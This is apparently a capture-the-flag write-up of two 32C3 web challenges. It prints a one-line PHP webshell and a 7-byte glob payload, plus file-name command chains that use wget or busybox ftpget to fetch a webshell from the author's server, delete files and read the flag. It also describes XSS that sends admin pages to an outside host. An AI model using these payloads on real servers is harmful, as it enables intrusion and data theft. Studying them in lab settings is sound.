A dog · 2015/12/31 11:57

0x00 Introduction


I am a sales dog, but I can still do Web challenges, which makes me very happy. This time I did two challenges: TinyHosting and Kummerkasten.

0x01 TinyHosting


A new file hosting service for very small files. Could you pwn it?

http://136.243.194.53/

The page has a hidden src parameter: appending ?src=1 to the URL returns the source code of the page.

You can upload files with arbitrary names to the server, but the content of each file is limited to 7 characters.

The shortest PHP webshell should be the 14 character one:

```php
<?=`$_GET[1]`;
```

(PS: I rewrote the original code from memory, so forgive me if there is a mistake.)

Obviously that is far too long for 7 characters.

Then I got creative and came up with this lovely `*` payload, which is the key to the whole challenge.

```bash
z.php
```

Content as follows:

```php
<?=`*`;
```

Exactly seven characters, no more, no less. The shell expands `*` to the sorted file names in the current directory, so the first name becomes the command and the remaining names become its arguments.

So I need to construct an execution chain out of file names; the first idea was:

```bash
busybox ftpget two.dog w.php z.php
```

The first four files have arbitrary content; only the names matter. The key payload is w.php: when z.php runs, the content of w.php is overwritten with the webshell fetched from my server, and I then access that webshell.

However, busybox ftpget only accepts IP addresses as the host, not domain names, so this did not work.

Next I tried to build the chain with wget, taking advantage of the fact that a 302 redirect can switch protocols.

```bash
wget wtf.two.dog z.php
```

The first two file names form the payload; z.php is again the `*` file.

On closer inspection, however, the challenge creates an index.html in every user's directory. It sorts before the other names and becomes the command word, so the execution chain is broken and does not work.

So I first use bash to delete index.html.

Construction:

```bash
bash bb index.html z.php
```

The content of bash is arbitrary, and bb contains `rm ./*`, which fits within the 7-character limit. Then I get a webshell using the method above and find the flag in the root directory.

With bash, bb and z.php again, and bb containing `ls /` and then `cat /f*`: simple and direct 0 0
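To make the `*` trick and the index.html failure concrete, here is an added Python model (not code from the writeup) that simulates bash's default `*` expansion for a planned set of uploaded names. The 7-character limit, the index.html file and the file names come from the text above; the C-locale sort order and dotfile handling are assumptions about the target's shell.

```python
"""Model of the `*` trick from the TinyHosting writeup.

Added illustration, not code from the original post. It simulates bash's
default `*` expansion (dotfiles skipped, names sorted in C-locale byte order)
to show how uploaded file names become the argv of the 7-byte payload
`<?=`*`;` and why the service's own index.html broke the wget chain.
"""

CONTENT_LIMIT = 7                # per-file content cap stated in the challenge
SERVICE_FILES = ("index.html",)  # file the service drops into every directory


def fits_limit(content):
    """True if a file body fits the challenge's 7-character content limit."""
    return len(content.encode()) <= CONTENT_LIMIT


def glob_argv(names):
    """argv that bash builds from `*` for a directory holding these names."""
    return sorted(n for n in names if not n.startswith("."))


def simulate_chain(uploaded, service_files=SERVICE_FILES):
    """Return (argv, intact) for the planned uploads plus the service's files.

    intact is True when argv[0] (the command word) is one of the uploaded names;
    it is False when a service file such as index.html sorts first and becomes
    the command, which is exactly how the wget chain in the writeup failed.
    """
    oversized = [n for n, body in uploaded.items() if not fits_limit(body)]
    if oversized:
        raise ValueError("content over %d bytes: %s" % (CONTENT_LIMIT, oversized))
    argv = glob_argv(list(uploaded) + list(service_files))
    return argv, argv[0] in uploaded


if __name__ == "__main__":
    star = "<?=`*`;"  # the 7-byte payload from the writeup
    for label, files in [
        ("wget", {"wget": "", "wtf.two.dog": "", "z.php": star}),
        ("bash", {"bash": "", "bb": "rm ./*", "z.php": star}),
    ]:
        argv, intact = simulate_chain(files)
        print("%-5s -> %s (%s)" % (label, " ".join(argv), "runs" if intact else "broken"))
```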

0x02 Kummerkasten


Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site http://136.243.194.46/

Please note: This challenge does not follow the flag format.

Hints:

To build the flag, concatenate both parts and omit '32C3_'

After opening the site, the only thing you can do is submit a message. I looked around and found nothing else, so I guessed it was about XSS.


Direct access gave a 403, so I felt I needed the XSS to read the page contents for me.

My original idea was to load jQuery through the XSS and use it for the requests; it turned out jQuery was already on the page, which was very convenient.

With Ajax I could easily read pages and post their contents back to my server.

This revealed /admin/bugs and /admin/token.

According to the information on the page, the key is to read two PNG images back.

The final payload is as follows:

Then combine the two images, a MySQL password and a 6-digit number to assemble the flag.

0x03 Other

More writeups can be found at the following link:

Github.com/ctfs/write-…